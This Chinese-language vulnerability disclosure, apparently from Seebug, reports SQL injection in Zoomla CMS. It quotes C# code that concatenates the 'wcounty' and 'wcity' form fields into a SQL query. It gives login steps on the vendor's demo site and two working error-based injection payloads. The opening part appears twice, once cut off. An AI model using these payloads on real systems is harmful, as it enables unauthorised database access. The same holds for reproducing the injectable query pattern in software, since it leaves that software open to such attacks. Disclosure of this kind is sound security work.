### 简要描述: 逐浪cms最新版sql注入 ### 详细说明: 逐浪最新版 sql注入 可以注册普通用户 访问 ``` http://demo.zoomla.cn/User/Register.aspx ``` 随便注册一个用户 test1234 密码123456 访问 ``` http://demo.zoomla.cn/User/Login.aspx?ReturnUrl= ``` 登录 访问 ``` http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { if (!base.IsPostBack) { string str = base.Request.Form["sex"]; string str2 = base.Request.Form["age1"]; string str3 = base.Request.Form["age2"]; string str4 = base.Request.Form["wcounty"]; //没处理 string str5 = base.Request.Form["wcity"]; //没处理 string wherex = ""; if (!string.IsNullOrEmpty(str)) { if (str == "女生") { wherex = wherex + " and UserSex=0"; } else if (str == "男生") { wherex = wherex + " and UserSex=1"; } } if (!string.IsNullOrEmpty(str2)) { string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString(); wherex = wherex + " and BirthDay<='" + str7 + "'"; } if (!string.IsNullOrEmpty(str3)) { string str8 =...
### 简要描述: 逐浪cms最新版sql注入 ### 详细说明: 逐浪最新版 sql注入 可以注册普通用户 访问 ``` http://demo.zoomla.cn/User/Register.aspx ``` 随便注册一个用户 test1234 密码123456 访问 ``` http://demo.zoomla.cn/User/Login.aspx?ReturnUrl= ``` 登录 访问 ``` http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { if (!base.IsPostBack) { string str = base.Request.Form["sex"]; string str2 = base.Request.Form["age1"]; string str3 = base.Request.Form["age2"]; string str4 = base.Request.Form["wcounty"]; //没处理 string str5 = base.Request.Form["wcity"]; //没处理 string wherex = ""; if (!string.IsNullOrEmpty(str)) { if (str == "女生") { wherex = wherex + " and UserSex=0"; } else if (str == "男生") { wherex = wherex + " and UserSex=1"; } } if (!string.IsNullOrEmpty(str2)) { string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString(); wherex = wherex + " and BirthDay<='" + str7 + "'"; } if (!string.IsNullOrEmpty(str3)) { string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString(); wherex = wherex + " and BirthDay>='" + str8 + "'"; } if (!string.IsNullOrEmpty(str4)) { wherex = wherex + " and workProvince='" + str4 + "'"; //存在注入 if (!string.IsNullOrEmpty(str5)) { wherex = wherex + " and workCity='" + str5 + "'"; //存在注入 } } this.ViewState["wherex"] = wherex; if (!this.buser.CheckLogin()) { if (SiteConfig.UserConfig.EnableCheckCodeOfLogin) { this.PhValCode.Visible = true; } else { this.PhValCode.Visible = false; } this.dwindow.Style["display"] = ""; } else { DataTable dt = new DataTable(); dt = UserTableBLL.GetUsersInfo(wherex); this.Bind(dt); } } } ``` 访问 ``` http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx ``` 提交 ``` sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 -- ``` [<img src="https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png" alt="71.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png) 提交 ``` sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 -- ``` [<img src="https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png" alt="72.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png) ### 漏洞证明: 漏洞证明如上
